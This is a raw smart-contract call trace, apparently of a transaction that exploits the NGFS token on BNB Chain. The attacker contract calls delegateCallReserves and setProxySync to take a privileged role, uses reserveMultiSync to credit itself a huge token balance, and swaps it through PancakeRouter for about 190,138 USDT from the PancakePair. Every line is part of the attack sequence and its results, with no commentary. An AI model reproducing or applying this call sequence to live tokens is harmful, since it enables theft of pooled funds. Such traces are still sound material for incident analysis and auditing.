[1][CALL] from=0xd03d36, to=0xc73781, 0x09b8790a() -> None
  [2][STATICCALL] from=0xc73781, to=PancakeFactory, getPair((address): 0x55d398) -> 0x687756
  [2][CALL] from=0xc73781, to=NGFSToken, delegateCallReserves() -> None
  [2][CALL] from=0xc73781, to=NGFSToken, setProxySync(_addr(address): 0xC73781) -> None
  [2][STATICCALL] from=0xc73781, to=NGFSToken, balanceOf(account(address): 0x687756) -> 1919552117750677378921846213
  [2][CALL] from=0xc73781, to=NGFSToken, reserveMultiSync(syncAddr(address): 0xC73781, syncAmount(uint256): 191955211775067737892184621300) -> None
  [2][STATICCALL] from=0xc73781, to=NGFSToken, balanceOf(account(address): 0xC73781) -> 191955211775067737892184621300
  [2][CALL] from=0xc73781, to=NGFSToken, approve(spender(address): 0x10ED43, amount(uint256): 115792089237316195423570985008687907853269...) -> True
  [2][CALL] from=0xc73781, to=PancakeRouter, swapExactTokensForTokensSupportingFeeOnTransferTokens(amountIn(uint256): 191955211775067737892184621300, amountOutMin(uint256): 0, path(address[]): ['0xa608985f5b40CDf6862bEC775207f84280a91E..., to(address): 0xC73781, deadline(uint256): 1714043885) -> None
    [3][CALL] from=PancakeRouter, to=NGFSToken, transferFrom(sender(address): 0xC73781, recipient(address): 0x687756, amount(uint256): 191955211775067737892184621300) -> True
    [3][STATICCALL] from=PancakeRouter, to=BEP20USDT, balanceOf(account(address): 0xC73781) -> 0
    [3][STATICCALL] from=PancakeRouter, to=PancakePair, getReserves() -> ['192044910952619638111430', '1919552117750677378921846213', '1714038677']
    [3][STATICCALL] from=PancakeRouter, to=NGFSToken, balanceOf(account(address): 0x687756) -> 193874763892818415271106467513
    [3][CALL] from=PancakeRouter, to=PancakePair, swap(amount0Out(uint256): 190138757990310758328686, amount1Out(uint256): 0, to(address): 0xC73781, data(bytes): b'') -> None
      [4][CALL] from=PancakePair, to=BEP20USDT, transfer(recipient(address): 0xC73781, amount(uint256): 190138757990310758328686) -> True
      [4][STATICCALL] from=PancakePair, to=BEP20USDT, balanceOf(account(address): 0x687756) -> 1906152962308879782744
      [4][STATICCALL] from=PancakePair, to=NGFSToken, balanceOf(account(address): 0x687756) -> 193874763892818415271106467513
    [3][STATICCALL] from=PancakeRouter, to=BEP20USDT, balanceOf(account(address): 0xC73781) -> 190138757990310758328686
  [2][STATICCALL] from=0xc73781, to=BEP20USDT, balanceOf(account(address): 0xC73781) -> 190138757990310758328686
  [2][STATICCALL] from=0xc73781, to=0x000000, 0x9710a9d0() -> None
